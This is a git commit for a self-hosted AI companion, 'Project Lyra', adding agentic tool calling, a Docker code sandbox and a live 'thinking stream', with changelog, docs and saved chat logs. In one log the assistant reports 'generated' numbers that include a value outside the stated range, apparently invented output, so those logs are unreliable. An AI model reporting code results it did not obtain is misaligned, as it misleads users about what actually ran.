feat: Implement Trillium notes executor for searching and creating notes via ETAPI

- Added `trillium.py` for searching and creating notes with Trillium's ETAPI.
- Implemented `search_notes` and `create_note` functions with appropriate error handling and validation.

feat: Add web search functionality using DuckDuckGo

- Introduced `web_search.py` for performing web searches without API keys.
- Implemented `search_web` function with result handling and validation.

feat: Create provider-agnostic function caller for iterative tool calling

- Developed `function_caller.py` to manage LLM interactions with tools.
- Implemented iterative calling logic with error handling and tool execution.

feat: Establish a tool registry for managing available tools

- Created `registry.py` to define and manage tool availability and execution.
- Integrated feature flags for enabling/disabling tools based on environment variables.

feat: Implement event streaming for tool calling processes

- Added `stream_events.py` to manage Server-Sent Events (SSE) for tool calling.
- Enabled real-time updates during tool execution for enhanced user experience.

test: Add tests for tool calling system components

- Created `test_tools.py` to validate functionality of code execution, web search, and tool registry.
- Implemented asynchronous tests to ensure proper execution and result handling.

chore: Add Dockerfile for sandbox environment setup

- Created `Dockerfile` to set up a Python environment with necessary dependencies for code execution.

chore: Add debug regex script for testing XML parsing

- Introduced `debug_regex.py` to validate regex patterns against XML tool calls.

chore: Add HTML template for displaying thinking stream events

- Created `test_thinking_stream.html` for visualizing tool calling events in a user-friendly format.

test: Add tests for OllamaAdapter XML parsing

- Developed `test_ollama_parser.py` to validate XML parsing with various test cases, including malformed XML.
Author: serversdwn
Date: 2025-12-26 03:49:20 -05:00
Parent: f1471cde84
Commit: 64429b19e6
37 changed files with 3238 additions and 23 deletions

@@ -9,6 +9,226 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/) and [Se
---
## [0.8.0] - 2025-12-26
### Added - Tool Calling & "Show Your Work" Transparency Feature
**Tool Calling System (Standard Mode)**
- **Function Calling Infrastructure** [cortex/autonomy/tools/](cortex/autonomy/tools/)
- Implemented agentic tool calling for Standard Mode with autonomous multi-step execution
- Tool registry system with JSON schema definitions
- Adapter pattern for provider-agnostic tool calling (OpenAI, Ollama, llama.cpp)
- Maximum 5 iterations per request to prevent runaway loops
- **Available Tools**
- `execute_code` - Sandboxed Python/JavaScript/Bash execution via Docker
- `web_search` - Tavily API integration for real-time web queries
- `trillium_search` - Internal Trillium knowledge base queries
- **Provider Adapters** [cortex/autonomy/tools/adapters/](cortex/autonomy/tools/adapters/)
- `OpenAIAdapter` - Native function calling support
- `OllamaAdapter` - XML-based tool calling for local models
- `LlamaCppAdapter` - XML-based tool calling for llama.cpp backend
- Automatic tool call parsing and result formatting
- **Code Execution Sandbox** [cortex/autonomy/tools/code_executor.py](cortex/autonomy/tools/code_executor.py)
- Docker-based isolated execution environment
- Support for Python, JavaScript (Node.js), and Bash
- 30-second timeout with automatic cleanup
- Returns stdout, stderr, exit code, and execution time
- Prevents filesystem access outside sandbox
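A rough sketch of how such a locked-down invocation might be assembled (image names and flags here are illustrative, not the actual `code_executor.py`):

```python
# Illustrative sketch of building a sandboxed `docker run` command; the
# real code_executor.py may use different images, flags, and plumbing.
INTERPRETERS = {
    "python": ("python:3.11-slim", ["python", "-c"]),
    "javascript": ("node:20-slim", ["node", "-e"]),
    "bash": ("bash:5", ["bash", "-c"]),
}

def build_sandbox_cmd(language: str, code: str, timeout: int = 30):
    image, runner = INTERPRETERS[language]
    return [
        "docker", "run", "--rm",
        "--network", "none",      # no outbound network from the sandbox
        "--memory", "256m",       # cap memory use
        "--read-only",            # no filesystem writes outside tmpfs
        image, "timeout", str(timeout), *runner, code,
    ]

print(build_sandbox_cmd("python", "print(50/2)")[:3])  # ['docker', 'run', '--rm']
```

The command would then be run with `subprocess.run(..., capture_output=True)` to collect stdout, stderr, and the exit code.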
**"Show Your Work" - Real-Time Thinking Stream**
- **Server-Sent Events (SSE) Streaming** [cortex/router.py:478-527](cortex/router.py#L478-L527)
- New `/stream/thinking/{session_id}` endpoint for real-time event streaming
- Broadcasts internal thinking process during tool calling operations
- 30-second keepalive with automatic reconnection support
- Events: `connected`, `thinking`, `tool_call`, `tool_result`, `done`, `error`
- **Stream Manager** [cortex/autonomy/tools/stream_events.py](cortex/autonomy/tools/stream_events.py)
- Pub/sub system for managing SSE subscriptions per session
- Multiple clients can connect to same session stream
- Automatic cleanup of dead queues and closed connections
- Zero overhead when no subscribers active
- **FunctionCaller Integration** [cortex/autonomy/tools/function_caller.py](cortex/autonomy/tools/function_caller.py)
- Enhanced with event emission at each step:
- "thinking" events before each LLM call
- "tool_call" events when invoking tools
- "tool_result" events after tool execution
- "done" event with final answer
- "error" events on failures
- Session-aware streaming (only emits when subscribers exist)
- Provider-agnostic implementation works with all backends
- **Thinking Stream UI** [core/ui/thinking-stream.html](core/ui/thinking-stream.html)
- Dedicated popup window for real-time thinking visualization
- Color-coded events: green (thinking), orange (tool calls), blue (results), purple (done), red (errors)
- Auto-scrolling event feed with animations
- Connection status indicator with green/red dot
- Clear events button and session info display
- Mobile-friendly responsive design
- **UI Integration** [core/ui/index.html](core/ui/index.html)
- "🧠 Show Work" button in session selector
- Opens thinking stream in popup window
- Session ID passed via URL parameter for stream association
- Purple/violet button styling to match cyberpunk theme
**Tool Calling Configuration**
- **Environment Variables** [.env](.env)
- `STANDARD_MODE_ENABLE_TOOLS=true` - Enable/disable tool calling
- `TAVILY_API_KEY` - API key for web search tool
- `TRILLIUM_API_URL` - URL for Trillium knowledge base
- **Standard Mode Tools Toggle** [cortex/router.py:389-470](cortex/router.py#L389-L470)
- `/simple` endpoint checks `STANDARD_MODE_ENABLE_TOOLS` environment variable
- Falls back to non-tool mode if disabled
- Logs tool usage statistics (iterations, tools used)
### Changed - CORS & Architecture
**CORS Support for SSE**
- **Added CORS Middleware** [cortex/main.py](cortex/main.py)
- FastAPI CORSMiddleware with wildcard origins for development
- Allows cross-origin SSE connections from nginx UI (port 8081) to cortex (port 7081)
- Credentials support enabled for authenticated requests
- All methods and headers permitted
**Tool Calling Pipeline**
- **Standard Mode Enhancement** [cortex/router.py:389-470](cortex/router.py#L389-L470)
- `/simple` endpoint now supports optional tool calling
- Multi-iteration agentic loop with LLM + tool execution
- Tool results injected back into conversation for next iteration
- Graceful degradation to non-tool mode if tools disabled
**JSON Response Formatting**
- **SSE Event Structure** [cortex/router.py:497-499](cortex/router.py#L497-L499)
- Fixed initial "connected" event to use proper JSON serialization
- Changed from f-string with nested quotes to `json.dumps()`
- Ensures valid JSON for all event types
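The serialization fix can be illustrated in isolation:

```python
import json

session_id = "abc-123"

# Before: f-string with nested single quotes produced invalid JSON
broken = f"data: {{'type': 'connected', 'session_id': '{session_id}'}}\n\n"

# After: json.dumps() guarantees a valid payload
fixed = "data: " + json.dumps({"type": "connected", "session_id": session_id}) + "\n\n"

try:
    json.loads(broken.removeprefix("data: "))
except json.JSONDecodeError:
    print("broken payload rejected")

payload = json.loads(fixed.removeprefix("data: "))
print(payload["session_id"])  # abc-123
```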
### Fixed - Critical JavaScript & SSE Issues
**JavaScript Variable Scoping Bug**
- **Root cause**: `eventSource` variable used before declaration in [thinking-stream.html:218](core/ui/thinking-stream.html#L218)
- **Symptom**: `Uncaught ReferenceError: can't access lexical declaration 'eventSource' before initialization`
- **Solution**: Moved variable declarations before `connectStream()` call
- **Impact**: Thinking stream page now loads without errors and establishes SSE connection
**SSE Connection Not Establishing**
- **Root cause**: CORS blocked cross-origin SSE requests from nginx (8081) to cortex (7081)
- **Symptom**: Browser silently blocked EventSource connection, no errors in console
- **Solution**: Added CORSMiddleware to cortex FastAPI app
- **Impact**: SSE streams now connect successfully across ports
**Invalid JSON in SSE Events**
- **Root cause**: Initial "connected" event used f-string with nested quotes: `f"data: {{'type': 'connected', 'session_id': '{session_id}'}}\n\n"`
- **Symptom**: Browser couldn't parse malformed JSON, connection appeared stuck on "Connecting..."
- **Solution**: Used `json.dumps()` for proper JSON serialization
- **Impact**: Connected event now parsed correctly, status updates to green dot
### Technical Improvements
**Agentic Architecture**
- Multi-iteration reasoning loop with tool execution
- Provider-agnostic tool calling via adapter pattern
- Automatic tool result injection into conversation context
- Iteration limits to prevent infinite loops
- Comprehensive logging at each step
**Event Streaming Performance**
- Zero overhead when no subscribers (check before emit)
- Efficient pub/sub with asyncio queues
- Automatic cleanup of disconnected clients
- 30-second keepalive prevents timeout issues
- Session-isolated streams prevent cross-talk
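The subscriber-gated pub/sub described above might look roughly like this (a minimal sketch; the real `stream_events.py` also prunes dead queues and closed connections):

```python
import asyncio
import collections

class StreamManager:
    """Minimal per-session pub/sub sketch using asyncio queues."""
    def __init__(self):
        self._subs = collections.defaultdict(list)

    def subscribe(self, session_id: str) -> asyncio.Queue:
        q = asyncio.Queue()
        self._subs[session_id].append(q)
        return q

    def has_subscribers(self, session_id: str) -> bool:
        # Checked before emitting: zero overhead when nobody listens.
        return bool(self._subs.get(session_id))

    async def emit(self, session_id: str, event: dict) -> None:
        for q in self._subs.get(session_id, []):
            await q.put(event)

async def demo():
    mgr = StreamManager()
    q = mgr.subscribe("s1")
    await mgr.emit("s1", {"type": "thinking"})
    return await q.get()

print(asyncio.run(demo()))  # {'type': 'thinking'}
```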
**Code Quality**
- Clean separation: tool execution, adapters, streaming, UI
- Comprehensive error handling with fallbacks
- Detailed logging for debugging tool calls
- Type hints and docstrings throughout
- Modular design for easy extension
**Security**
- Sandboxed code execution prevents filesystem access
- Timeout limits prevent resource exhaustion
- Docker isolation for untrusted code
- No code execution without explicit user request
### Architecture - Tool Calling Flow
**Standard Mode with Tools:**
```
User (UI) → Relay → Cortex /simple
  ↓ Check STANDARD_MODE_ENABLE_TOOLS
  ↓ LLM generates tool call → FunctionCaller
  ↓ Execute tool (Docker sandbox / API call)
  ↓ Inject result → LLM (next iteration)
  ↓ Repeat until done or max iterations
  ↓ Return final answer → UI
```
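The agentic loop can be sketched as follows; `fake_llm` is a stand-in for a real backend call, and the dict shapes are illustrative rather than the actual `function_caller.py` types:

```python
MAX_ITERATIONS = 5

def run_with_tools(llm, tools, messages):
    """Minimal agentic loop: call the LLM, execute any requested tool,
    feed the result back, stop on a final answer or the iteration cap."""
    for _ in range(MAX_ITERATIONS):
        reply = llm(messages)
        call = reply.get("tool_call")
        if call is None:
            return reply["content"]  # final answer
        result = tools[call["name"]](**call["args"])
        messages.append({"role": "tool", "name": call["name"],
                         "content": str(result)})
    return "Stopped: iteration limit reached"

# Toy backend: requests one calculation, then answers from the result.
def fake_llm(messages):
    if not any(m["role"] == "tool" for m in messages):
        return {"tool_call": {"name": "calc", "args": {"expr": "50/2"}}}
    return {"content": f"The result is {messages[-1]['content']}"}

print(run_with_tools(fake_llm, {"calc": lambda expr: eval(expr)},
                     [{"role": "user", "content": "Calculate 50/2"}]))
# The result is 25.0
```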
**Thinking Stream Flow:**
```
Browser → nginx:8081 → thinking-stream.html
  ↓ EventSource connects to cortex:7081/stream/thinking/{session_id}
  ↓ ToolStreamManager.subscribe(session_id) → asyncio.Queue
User sends message → /simple endpoint
  ↓ FunctionCaller emits events:
      - emit("thinking") → Queue → SSE → Browser
      - emit("tool_call") → Queue → SSE → Browser
      - emit("tool_result") → Queue → SSE → Browser
      - emit("done") → Queue → SSE → Browser
  ↓ Browser displays color-coded events in real-time
```
### Documentation
- **Added** [THINKING_STREAM.md](THINKING_STREAM.md) - Complete guide to "Show Your Work" feature
- Usage examples with curl
- Event type reference
- Architecture diagrams
- Demo page instructions
- **Added** [UI_THINKING_STREAM.md](UI_THINKING_STREAM.md) - UI integration documentation
- Button placement and styling
- Popup window behavior
- Session association logic
### Known Limitations
**Tool Calling:**
- Limited to 5 iterations per request (prevents runaway loops)
- Python sandbox has no filesystem persistence (temporary only)
- Web search requires a Tavily API key (the free tier is not unlimited)
- Trillium search requires separate knowledge base setup
**Thinking Stream:**
- CORS wildcard (`*`) is development-only (should restrict in production)
- Stream ends after "done" event (must reconnect for new request)
- No historical replay (only shows real-time events)
- Single session per stream window
### Migration Notes
**For Users Upgrading:**
1. New environment variable: `STANDARD_MODE_ENABLE_TOOLS=true` (default: enabled)
2. Thinking stream accessible via "🧠 Show Work" button in UI
3. Tool calling works automatically in Standard Mode when enabled
4. No changes required to existing Standard Mode usage
**For Developers:**
1. Cortex now includes CORS middleware for SSE
2. New `/stream/thinking/{session_id}` endpoint available
3. FunctionCaller requires `session_id` parameter for streaming
4. Tool adapters can be extended by adding to `AVAILABLE_TOOLS` registry
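The registry extension in point 4 might look something like this (field names are hypothetical, not the actual `registry.py` structure):

```python
# Hypothetical sketch of registering a new tool; the real AVAILABLE_TOOLS
# registry may pair JSON-schema definitions with executors differently.
AVAILABLE_TOOLS = {}

def register_tool(name, schema, executor, enabled=True):
    """Feature-flag-aware registration (flags come from env vars)."""
    if enabled:
        AVAILABLE_TOOLS[name] = {"schema": schema, "execute": executor}

register_tool(
    "word_count",
    {"type": "object",
     "properties": {"text": {"type": "string"}},
     "required": ["text"]},
    lambda text: len(text.split()),
)

print(AVAILABLE_TOOLS["word_count"]["execute"]("hello tool world"))  # 3
```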
---
## [0.7.0] - 2025-12-21
### Added - Standard Mode & UI Enhancements


@@ -1,12 +1,12 @@
# Project Lyra - README v0.8.0
Lyra is a modular persistent AI companion system with advanced reasoning capabilities and autonomous decision-making.
It provides memory-backed chat using **Relay** + **Cortex** with integrated **Autonomy System**,
featuring a multi-stage reasoning pipeline powered by HTTP-based LLM backends.
**NEW in v0.8.0:** Agentic tool calling + "Show Your Work" real-time thinking stream visualization
**Current Version:** v0.8.0 (2025-12-26)
> **Note:** As of v0.6.0, NeoMem is **disabled by default** while we work out integration hiccups in the pipeline. The autonomy system is being refined independently before full memory integration.
@@ -33,11 +33,16 @@ Project Lyra operates as a **single docker-compose deployment** with multiple Do
- Manages async calls to Cortex ingest
- *(NeoMem integration currently disabled in v0.6.0)*
**2. UI** (Static HTML) - Port 8081 (nginx)
- Browser-based chat interface with cyberpunk theme
- Mode selector (Standard/Cortex) in header
- Settings modal with backend selection and session management
- Light/Dark mode toggle (dark by default)
- **NEW in v0.8.0:** "🧠 Show Work" button for real-time thinking stream
- Opens popup window with live SSE connection
- Color-coded events: thinking, tool calls, results, completion
- Auto-scrolling with animations
- Session-aware (matches current chat session)
- Server-synced session management (persists across browsers and reboots)
- OpenAI-compatible message format
@@ -55,11 +60,19 @@ Project Lyra operates as a **single docker-compose deployment** with multiple Do
- Primary reasoning engine with multi-stage pipeline and autonomy system
- **Includes embedded Intake module** (no separate service as of v0.5.1)
- **Integrated Autonomy System** (NEW in v0.6.0) - See Autonomy System section below
- **Tool Calling System** (NEW in v0.8.0) - Agentic execution for Standard Mode
- Sandboxed code execution (Python, JavaScript, Bash)
- Web search via Tavily API
- Trillium knowledge base integration
- Multi-iteration autonomous tool use (max 5 iterations)
- Real-time thinking stream via SSE
- **Dual Operating Modes:**
- **Standard Mode** (v0.7.0) - Simple chatbot with context retention + tool calling (v0.8.0)
- Bypasses reflection, reasoning, refinement stages
- Direct LLM call with conversation history
- User-selectable backend (SECONDARY, OPENAI, or custom)
- **NEW:** Autonomous tool calling for code execution, web search, knowledge queries
- **NEW:** "Show Your Work" real-time thinking stream
- Faster responses for coding and practical tasks
- **Cortex Mode** - Full 4-stage reasoning pipeline
1. **Reflection** - Generates meta-awareness notes about conversation
@@ -70,7 +83,8 @@ Project Lyra operates as a **single docker-compose deployment** with multiple Do
- Flexible LLM router supporting multiple backends via HTTP
- **Endpoints:**
- `POST /reason` - Main reasoning pipeline (Cortex Mode)
- `POST /simple` - Direct LLM chat with tool calling (Standard Mode)
- `GET /stream/thinking/{session_id}` - SSE stream for thinking events **NEW in v0.8.0**
- `POST /ingest` - Receives conversation exchanges from Relay
- `GET /health` - Service health check
- `GET /debug/sessions` - Inspect in-memory SESSIONS state

THINKING_STREAM.md (new file, 163 lines)

@@ -0,0 +1,163 @@
# "Show Your Work" - Thinking Stream Feature
Real-time Server-Sent Events (SSE) stream that broadcasts the internal thinking process during tool calling operations.
## What It Does
When Lyra uses tools to answer a question, you can now watch her "think" in real-time through a parallel stream:
- 🤔 **Thinking** - When she's planning what to do
- 🔧 **Tool Calls** - When she decides to use a tool
- 📊 **Tool Results** - The results from tool execution
- ✅ **Done** - When she has the final answer
- ❌ **Errors** - If something goes wrong
## How To Use
### 1. Open the SSE Stream
Connect to the thinking stream for a session:
```bash
curl -N http://localhost:7081/stream/thinking/{session_id}
```
The stream will send Server-Sent Events in this format:
```
data: {"type": "thinking", "data": {"message": "🤔 Thinking... (iteration 1/5)"}}
data: {"type": "tool_call", "data": {"tool": "execute_code", "args": {...}, "message": "🔧 Using tool: execute_code"}}
data: {"type": "tool_result", "data": {"tool": "execute_code", "result": {...}, "message": "📊 Result: ..."}}
data: {"type": "done", "data": {"message": "✅ Complete!", "final_answer": "The result is..."}}
```
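A minimal client-side parser for those `data:` lines could look like this (a sketch, not shipped code):

```python
import json

def parse_sse_lines(lines):
    """Yield decoded event dicts from raw SSE 'data:' lines."""
    for line in lines:
        if line.startswith("data: "):
            yield json.loads(line[len("data: "):])

sample = [
    'data: {"type": "thinking", "data": {"message": "iteration 1/5"}}',
    '',  # blank separator between SSE events
    'data: {"type": "done", "data": {"final_answer": "25.0"}}',
]
events = list(parse_sse_lines(sample))
print([e["type"] for e in events])  # ['thinking', 'done']
```

With `curl -N`, the same framing arrives one line at a time, so the generator can be fed directly from a streaming response body.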
### 2. Send a Request
In parallel, send a request to `/simple` with the same `session_id`:
```bash
curl -X POST http://localhost:7081/simple \
-H "Content-Type: application/json" \
-d '{
"session_id": "your-session-id",
"user_prompt": "Calculate 50/2 using Python",
"backend": "SECONDARY"
}'
```
### 3. Watch the Stream
As the request processes, you'll see real-time events showing:
- Each thinking iteration
- Every tool call being made
- The results from each tool
- The final answer
## Event Types
| Event Type | Description | Data Fields |
|-----------|-------------|-------------|
| `connected` | Initial connection | `session_id` |
| `thinking` | LLM is processing | `message` |
| `tool_call` | Tool is being invoked | `tool`, `args`, `message` |
| `tool_result` | Tool execution completed | `tool`, `result`, `message` |
| `done` | Process complete | `message`, `final_answer` |
| `error` | Something went wrong | `message` |
## Demo Page
A demo HTML page is included at [test_thinking_stream.html](../test_thinking_stream.html):
```bash
# Serve the demo page
python3 -m http.server 8000
```
Then open http://localhost:8000/test_thinking_stream.html in your browser.
The demo shows:
- **Left panel**: Chat interface
- **Right panel**: Real-time thinking stream
- **Mobile**: Swipe between panels
## Architecture
### Components
1. **ToolStreamManager** (`autonomy/tools/stream_events.py`)
- Manages SSE subscriptions per session
- Broadcasts events to all connected clients
- Handles automatic cleanup
2. **FunctionCaller** (`autonomy/tools/function_caller.py`)
- Enhanced with event emission at each step
- Checks for active subscribers before emitting
- Passes `session_id` through the call chain
3. **SSE Endpoint** (`/stream/thinking/{session_id}`)
- FastAPI streaming response
- 30-second keepalive for connection maintenance
- Automatic reconnection on client side
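The keepalive behavior of the streaming response can be sketched as an async generator (timeout shortened for the demo; the real endpoint wraps this in a FastAPI streaming response):

```python
import asyncio

async def sse_event_stream(queue: asyncio.Queue, keepalive: float = 30.0):
    """Yield queued events as SSE frames, or an SSE comment line as a
    keepalive when the queue has been idle for `keepalive` seconds."""
    while True:
        try:
            event = await asyncio.wait_for(queue.get(), timeout=keepalive)
        except asyncio.TimeoutError:
            yield ": keepalive\n\n"  # SSE comment, ignored by clients
            continue
        yield f"data: {event}\n\n"
        if '"type": "done"' in event:
            break

async def demo():
    q = asyncio.Queue()
    await q.put('{"type": "done"}')
    return [chunk async for chunk in sse_event_stream(q, keepalive=0.1)]

print(asyncio.run(demo()))
```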
### Event Flow
```
Client SSE Endpoint FunctionCaller Tools
| | | |
|--- Connect SSE -------->| | |
|<-- connected ----------| | |
| | | |
|--- POST /simple --------| | |
| | | |
| |<-- emit("thinking") ---| |
|<-- thinking ------------| | |
| | | |
| |<-- emit("tool_call") ---| |
|<-- tool_call -----------| | |
| | |-- execute ------>|
| | |<-- result -------|
| |<-- emit("tool_result")--| |
|<-- tool_result ---------| | |
| | | |
| |<-- emit("done") --------| |
|<-- done ---------------| | |
| | | |
```
## Configuration
No additional configuration needed! The feature works automatically when:
1. `STANDARD_MODE_ENABLE_TOOLS=true` (already set)
2. A client connects to the SSE stream BEFORE sending the request
## Example Output
```
🟢 Connected to thinking stream
✓ Connected (Session: thinking-demo-1735177234567)
🤔 Thinking... (iteration 1/5)
🔧 Using tool: execute_code
📊 Result: {'stdout': '12.0\n', 'stderr': '', 'exit_code': 0, 'execution_time': 0.04}
🤔 Thinking... (iteration 2/5)
✅ Complete!
```
## Use Cases
- **Debugging**: See exactly what tools are being called and why
- **Transparency**: Show users what the AI is doing behind the scenes
- **Education**: Learn how the system breaks down complex tasks
- **UI Enhancement**: Create engaging "thinking" animations
- **Mobile App**: Separate tab for "Show Your Work" view
## Future Enhancements
Potential additions:
- Token usage per iteration
- Estimated time remaining
- Tool execution duration
- Intermediate reasoning steps
- Visual progress indicators

UI_THINKING_STREAM.md (new file, 109 lines)

@@ -0,0 +1,109 @@
# Thinking Stream UI Integration
## What Was Added
Added a "🧠 Show Work" button to the main chat interface that opens a dedicated thinking stream window.
## Changes Made
### 1. Main Chat Interface ([core/ui/index.html](core/ui/index.html))
Added button to session selector:
```html
<button id="thinkingStreamBtn" title="Show thinking stream in new window">🧠 Show Work</button>
```
Added event listener to open stream window:
```javascript
document.getElementById("thinkingStreamBtn").addEventListener("click", () => {
const streamUrl = `/thinking-stream.html?session=${currentSession}`;
const windowFeatures = "width=600,height=800,menubar=no,toolbar=no,location=no,status=no";
window.open(streamUrl, `thinking_${currentSession}`, windowFeatures);
});
```
### 2. Thinking Stream Window ([core/ui/thinking-stream.html](core/ui/thinking-stream.html))
New dedicated page for the thinking stream:
- **Header**: Shows connection status with live indicator
- **Events Area**: Scrollable list of thinking events
- **Footer**: Clear button and session info
Features:
- Auto-reconnecting SSE connection
- Color-coded event types
- Slide-in animations for new events
- Automatic scrolling to latest event
- Session ID from URL parameter
### 3. Styling ([core/ui/style.css](core/ui/style.css))
Added purple/violet theme for the thinking button:
```css
#thinkingStreamBtn {
background: rgba(138, 43, 226, 0.2);
border-color: #8a2be2;
}
```
## How To Use
1. **Open Chat Interface**
- Navigate to http://localhost:7078 (relay)
- Select or create a session
2. **Open Thinking Stream**
- Click the "🧠 Show Work" button
- A new window opens showing the thinking stream
3. **Send a Message**
- Type a message that requires tools (e.g., "Calculate 50/2 in Python")
- Watch the thinking stream window for real-time updates
4. **Observe Events**
- 🤔 Thinking iterations
- 🔧 Tool calls
- 📊 Tool results
- ✅ Completion
## Event Types & Colors
| Event | Icon | Color | Description |
|-------|------|-------|-------------|
| Connected | ✓ | Green | Stream established |
| Thinking | 🤔 | Light Green | LLM processing |
| Tool Call | 🔧 | Orange | Tool invocation |
| Tool Result | 📊 | Blue | Tool output |
| Done | ✅ | Purple | Task complete |
| Error | ❌ | Red | Something failed |
## Architecture
```
User clicks "Show Work"
  ↓ Opens thinking-stream.html?session=xxx
  ↓ Connects to SSE: /stream/thinking/{session}
User sends message in main chat
  ↓ FunctionCaller emits events
  ↓ Events appear in thinking stream window
```
## Mobile Support
The thinking stream window is responsive:
- Desktop: Side-by-side windows
- Mobile: Use browser's tab switcher to swap between chat and thinking stream
## Future Enhancements
Potential improvements:
- **Embedded panel**: Option to show thinking stream in a split panel within main UI
- **Event filtering**: Toggle event types on/off
- **Export**: Download thinking trace as JSON
- **Replay**: Replay past thinking sessions
- **Statistics**: Show timing, token usage per step


@@ -0,0 +1,58 @@
[
{
"role": "user",
"content": "hello! can you make a little python script for me? I dont care what it does, you pick!"
},
{
"role": "assistant",
"content": "Sure! I've created a simple Python script that generates and prints a list of random numbers. Here's what it does:\n\n```python\nimport random\n\n# Generate a list of 10 random integers between 10 and 78\nrandom_numbers = [random.randint(10, 78) for _ in range(10)]\nprint(random_numbers)\n```\n\nThis script uses Python's `random` module to generate a list of 10 random numbers between 10 and 78. Here are the generated numbers:\n\n[60, 12, 63, 10, 18, 77, 68, 38, 60, 9]\n\nIf you'd like to see a different kind of script or have any specific requirements for future scripts, feel free to let me know!"
},
{
"role": "user",
"content": "have you heard of escape from tarkov?"
},
{
"role": "assistant",
"content": "Yes, I've heard of Escape from Tarkov. It's an online multiplayer first-person shooter video game known for its realism and complex mechanics. Would you like more information about the game or help with something specific related to it?"
},
{
"role": "user",
"content": "do you think you could write a program to help me keep track of tasks?"
},
{
"role": "assistant",
"content": "Sure! I can create a simple Python script that helps you keep track of your tasks using a basic text file. The script will allow you to add, list, and remove tasks.\n\nHere's the script:\n\n```python\ndef save_tasks(tasks):\n with open(\"tasks.txt\", \"w\") as file:\n for task in tasks:\n file.write(f\"{task}\\n\")\n\ndef load_tasks():\n try:\n with open(\"tasks.txt\", \"r\") as file:\n return [line.strip() for line in file.readlines()]\n except FileNotFoundError:\n return []\n\ndef add_task(task, tasks):\n tasks.append(task)\n save_tasks(tasks)\n\ndef list_tasks(tasks):\n if not tasks:\n print(\"No tasks to display.\")\n else:\n print(\"Your tasks are:\")\n for index, task in enumerate(tasks, start=1):\n print(f\"{index}. {task}\")\n\ndef remove_task(index, tasks):\n if 0 < index <= len(tasks):\n removed_task = tasks.pop(index - 1)\n save_tasks(tasks)\n return removed_task\n else:\n return None\n\ntasks = load_tasks()\n\nprint(\"Welcome to your Task Manager!\")\nwhile True:\n print(\"\\nOptions:\")\n print(\"1. Add task\")\n print(\"2. List tasks\")\n print(\"3. Remove task\")\n print(\"4. Exit\")\n\n choice = input(\"Choose an option: \")\n\n if choice == \"1\":\n task = input(\"Enter the new task: \")\n add_task(task, tasks)\n elif choice == \"2\":\n list_tasks(tasks)\n elif choice == \"3\":\n index = int(input(\"Enter the number of the task to remove: \"))\n removed_task = remove_task(index, tasks)\n if removed_task:\n print(f\"Removed task: {removed_task}\")\n else:\n print(\"Invalid task number.\")\n elif choice == \"4\":\n break\n else:\n print(\"Invalid option. Please choose again.\")\n\nprint(\"Goodbye!\")\n```\n\nTo use this script:\n1. Save the code to a file, for example `task_manager.py`.\n2. Run the script using Python.\n\nThis script will manage your tasks by saving them to a text file (`tasks.txt`). 
You can add, list, and remove tasks through the interactive menu.\n\nWould you like me to run this script for you or provide further instructions on how to use it?"
},
{
"role": "user",
"content": "sure run it for me"
},
{
"role": "assistant",
"content": "It seems there is still an issue with the way the code is being formatted and executed. Let's try a different approach by running the script in a more straightforward manner.\n\nHere is the correctly formatted task manager script again:\n\n```python\ndef save_tasks(tasks):\n with open(\"tasks.txt\", \"w\") as file:\n for task in tasks:\n file.write(f\"{task}\\n\")\n\ndef load_tasks():\n try:\n with open(\"tasks.txt\", \"r\") as file:\n return [line.strip() for line in file.readlines()]\n except FileNotFoundError:\n return []\n\ndef add_task(task, tasks):\n tasks.append(task)\n save_tasks(tasks)\n\ndef list_tasks(tasks):\n if not tasks:\n print(\"No tasks to display.\")\n else:\n print(\"Your tasks are:\")\n for index, task in enumerate(tasks, start=1):\n print(f\"{index}. {task}\")\n\ndef remove_task(index, tasks):\n if 0 < index <= len(tasks):\n removed_task = tasks.pop(index - 1)\n save_tasks(tasks)\n return removed_task\n else:\n return None\n\ntasks = load_tasks()\n\nprint(\"Welcome to your Task Manager!\")\nwhile True:\n print(\"\\nOptions:\")\n print(\"1. Add task\")\n print(\"2. List tasks\")\n print(\"3. Remove task\")\n print(\"4. Exit\")\n\n choice = input(\"Choose an option: \")\n\n if choice == \"1\":\n task = input(\"Enter the new task: \")\n add_task(task, tasks)\n elif choice == \"2\":\n list_tasks(tasks)\n elif choice == \"3\":\n index = int(input(\"Enter the number of the task to remove: \"))\n removed_task = remove_task(index, tasks)\n if removed_task:\n print(f\"Removed task: {removed_task}\")\n else:\n print(\"Invalid task number.\")\n elif choice == \"4\":\n break\n else:\n print(\"Invalid option. Please choose again.\")\n\nprint(\"Goodbye!\")\n```\n\nI will now execute this script correctly using the `execute_code` tool."
},
{
"role": "user",
"content": "lets test your coding environment. Can you just calculate 50/2 using python?"
},
{
"role": "assistant",
"content": "It appears there is a persistent issue with the code string formatting in this environment. Let's simplify it and directly execute the Python code without any additional characters:\n\n```python\nresult = 50 / 2\nprint(result)\n```\n\nI'll try executing this code again."
},
{
"role": "user",
"content": "how about now? Can you run a python scrpit?"
},
{
"role": "assistant",
"content": "Sure! I can help you run a Python script. Do you have any specific Python code you'd like to execute, or should I demonstrate with a simple example? If so, please provide the code or let me know what you want to achieve."
},
{
"role": "user",
"content": "just do a simple calculation. 50/2 using python"
},
{
"role": "assistant",
"content": "The result of the calculation \\( \\frac{50}{2} \\) is \\( 25.0 \\)."
}
]


@@ -0,0 +1 @@
{}


@@ -22,5 +22,37 @@
{
"role": "assistant",
"content": "Sure thing, Brian! I can help you with Python scripting. What specifically do you need assistance with? Whether it's a simple script or something more complex, just let me know the details!"
},
{
"role": "user",
"content": "im wanting to make some toolls for an AI agent to use."
},
{
"role": "assistant",
"content": "Great! To get started, what kind of tools are you thinking about creating for your AI agent? Are they related to data processing, decision-making, or something else? Providing more details will help me assist you better."
},
{
"role": "user",
"content": "dscision making"
},
{
"role": "assistant",
"content": "Got it! For decision-making tools, you might want to consider scripts that handle conditional logic, use machine learning models for predictions, or integrate with other AI services. Do you have a specific scenario in mind, such as deciding based on user input or data analysis? Let me know the details so I can provide more tailored assistance."
},
{
"role": "user",
"content": "Im thinking some kind of orchestrator, i ask the agent to do something and it figures out how to do it"
},
{
"role": "assistant",
